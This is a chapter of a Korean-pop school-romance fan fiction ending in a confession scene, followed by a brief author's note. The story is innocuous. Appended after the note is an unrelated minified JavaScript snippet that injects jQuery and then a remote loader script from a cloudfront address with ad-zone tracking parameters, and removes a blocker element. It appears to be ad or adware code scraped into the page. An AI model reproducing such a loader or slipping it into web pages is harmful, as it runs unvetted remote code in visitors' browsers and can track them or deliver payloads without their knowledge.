Chapter 26

The Presidential Son

 

Your POV

 

“Aigoo, my honey cooked dinner.” I heard Kai say. Sehun chuckled as he heard his voice.

“Good evening.” I felt two arms around my waist.

“Kai, the pan is hot, arms off now.”

He laughed and tied my hair.

“Are you really going to meet him tomorrow after class?” Kai asked as he leaned on the counter. Sehun glared at me.

“It would be rude if I don’t, I already said I’d meet him. Relax, he’s a good person.”

Sehun scoffed.

 

Narrator’s POV

 

Myungsoo was having dinner with his parents peacefully. But something was bothering him.

Truth is before he left school, he saw Seokjun and his friends whispering to each other and he was bothered that he didn’t get to check on Haerin before going home.

“Son? Is something wrong?”

Myungsoo looked up.

“Nothing, eomma.” He replied. His mother smiled and winked at her husband. Lately, they noticed that their son has changed. And from what his bodyguards have reported it all had to do with a girl. And his parents were happy that finally their son has found someone.

 

Myungsoo sat on his usual seat. He tapped on the marble chair as he waited for Haerin to appear; finally he saw her walking with Seokjun. His eyes twitched in annoyance, but he pushed himself on the seat and walked to them.

“Oh, good morning Myungsoo!” Haerin beamed at him. Myungsoo nodded at her.

“Can I talk to her?” He asked. The hoobae nodded.

“I meant privately.” Myungsoo crossed his arms. The hoobae ran off.

Haerin blinked and looked at Myungsoo.

“What was that all about?” She asked as she wrapped one arm around his. Myungsoo didn’t reply but they just continued to walk.

“You know, you cant just scare people like that.” Haerin said. Myungsoo looked at her.

“What kind of friend leaves another friend just for a hoabae then?” He asked. Haerin but her lip and chuckled.

“Fine, today I’ll be at class with you and eat lunch with the guys, happy now?”

Myungsoo nodded and lightly pinched her cheek. Haerin felt color rush into her face again. She sighed and looked away.

 

Your POV

 

“We’re happy to have you here, Haerin.” Sunggyu oppa grinned as we sat down.

“L finally placed that kid inside a sack?” Dongwoo oppa asked with a serious face. No one commented or laughed, then I realized that he was being serious.

“Myungsoo!”

Myungsoo looked up while chewing.

tumblr_m0g8p9PCmL1r3xllho3_250.gif

He just shrugged.

“How could~”

“He was annoying. I get rid of annoying things that way.” He said without any inflection in his voice. I sighed.

“Hopeless case you are, Myungsoo.”

He shrugged and went back to eat.

“Oh, right, Haerin-ah are you free after class?” Sungyeol asked.

“Hmm, not really. I have something to do, why?”

“Ah, that’s bad. I was wondering if you could join us for some barbeque.”

 

Narrator’s POV

 

Haerin stepped out of the building and made her way to the dorm.

“Staying for dinner?” Sehun asked as she got in.

“I’ll be back before dinner!” She hollered as she placed her bag on her bed and fixed her hair.

“Just ditch the kid, Rinnie.” Sehun leaned on her doorframe.

“That would be rude, anyway, I’ll be going.” She said as she patted his cheek and went down.

 

Haerin stepped in the coffee shop and found Seokjun.

“Am I late?” She asked before she sat down.

“Aniyo, sunbae. I just came in a little early.”

Haerin nodded. Seokjun fidgeted in his seat.

“Is there anything you want to say?” Haerin asked. Seokjun played with his fingers.

“Sun….Sunbae, I….like you….will you be my girlfriend?”

Haerin blinked at him.

 

++++++++++++++++++++++++++++++++++++++++

 

this fic is too slow, i mean the pace, i should step on it! HAHHAHA. I WANT AN ANGRY MYUNGSOO, WHO WANTS TOO?
if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};